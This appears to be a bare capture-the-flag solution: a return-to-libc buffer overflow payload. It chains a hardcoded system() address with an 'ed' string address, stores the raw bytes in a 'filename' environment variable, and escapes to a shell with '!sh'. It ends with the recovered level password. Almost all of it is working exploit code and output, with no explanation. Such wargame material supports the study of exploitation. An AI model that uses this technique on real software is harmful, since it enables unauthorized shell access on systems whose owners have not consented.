system_addr = 0xb7ee59b0
ed_addr = 0x08048f45 #addr of "ed" string

injection = "TTT" + (p32(system_addr) + p32(ed_addr)*2)*20

export filename=$'TTT\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08\xb0Y\xee\xb7E\x8f\x04\x08E\x8f\x04\x08'

type !sh

PASSWORD: OverTheFlow

